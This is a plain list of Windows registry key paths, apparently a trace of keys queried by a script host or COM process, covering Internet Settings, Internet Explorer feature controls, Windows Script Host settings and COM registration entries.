HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
